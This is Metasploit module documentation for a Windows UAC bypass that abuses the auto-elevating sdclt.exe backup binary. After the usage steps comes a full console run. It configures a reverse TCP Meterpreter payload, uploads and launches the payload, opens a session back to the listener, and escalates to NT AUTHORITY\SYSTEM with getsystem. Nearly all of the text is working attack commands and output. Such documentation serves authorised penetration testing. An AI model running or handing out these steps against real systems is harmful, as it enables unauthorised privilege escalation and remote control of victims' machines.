h00die
88 lines
3.1 KiB
Markdown
88 lines
3.1 KiB
Markdown
## Introduction
|
|
|
|
This module exploits an autoelevate feature in the windows backup
|
|
system's sdclt.exe binary to run as a higher integrity process.
|
|
|
|
## Usage
|
|
|
|
1. Create a session on the target system under the context of a local administrative user.
|
|
2. Begin interacting with the module: `use exploit/windows/local/bypassuac_sdclt`.
|
|
3. Set the `PAYLOAD` and configure it correctly.
|
|
4. If an existing handler is configured to receive the elevated session, then the module's
|
|
handler should be disabled: `set DisablePayloadHandler true`.
|
|
5. Make sure that the `SESSION` value is set to the existing session identifier.
|
|
6. Invoke the module: `run`.
|
|
|
|
## Scenarios
|
|
|
|
### Windows 10.0.17134 x64
|
|
|
|
```
|
|
msf5 exploit(windows/local/bypassuac_sdclt) > show options
|
|
|
|
Module options (exploit/windows/local/bypassuac_sdclt):
|
|
|
|
Name Current Setting Required Description
|
|
---- --------------- -------- -----------
|
|
PAYLOAD_NAME no The filename to use for the payload binary (%RAND% by default).
|
|
SESSION 1 yes The session to run this module on.
|
|
|
|
|
|
Payload options (windows/x64/meterpreter/reverse_tcp):
|
|
|
|
Name Current Setting Required Description
|
|
---- --------------- -------- -----------
|
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
|
LHOST 192.168.135.168 yes The listen address (an interface may be specified)
|
|
LPORT 4444 yes The listen port
|
|
|
|
|
|
Exploit target:
|
|
|
|
Id Name
|
|
-- ----
|
|
0 Windows x64
|
|
|
|
|
|
msf5 exploit(windows/local/bypassuac_sdclt) > run
|
|
|
|
[*] Started reverse TCP handler on 192.168.135.168:4444
|
|
[*] UAC is Enabled, checking level...
|
|
[*] Checking admin status...
|
|
[+] Part of Administrators group! Continuing...
|
|
[+] UAC is set to Default
|
|
[+] BypassUAC can bypass this setting, continuing...
|
|
[*] win_dir = C:\Windows
|
|
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
|
|
[*] exploit_dir = C:\Windows\System32\
|
|
[*] exploit_file = C:\Windows\System32\sdclt.exe
|
|
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
|
|
[*] Making Payload
|
|
[*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
|
|
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
|
|
[*] Payload Upload Complete
|
|
[*] Launching C:\Windows\System32\sdclt.exe
|
|
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe!
|
|
[*] Please wait for session and cleanup....
|
|
[*] Sending stage (206403 bytes) to 192.168.132.125
|
|
[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-10-25 14:55:08 -0500
|
|
[*] Removing Registry Changes
|
|
[*] Registry Changes Removed
|
|
|
|
meterpreter > sysinfo
|
|
Computer : DESKTOP-D1E425Q
|
|
OS : Windows 10 (10.0 Build 17134).
|
|
Architecture : x64
|
|
System Language : en_US
|
|
Domain : WORKGROUP
|
|
Logged On Users : 2
|
|
Meterpreter : x64/windows
|
|
meterpreter > getuid
|
|
Server username: DESKTOP-D1E425Q\msfuser
|
|
meterpreter > getsystem
|
|
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
|
|
meterpreter > getuid
|
|
Server username: NT AUTHORITY\SYSTEM
|
|
meterpreter >
|
|
```
|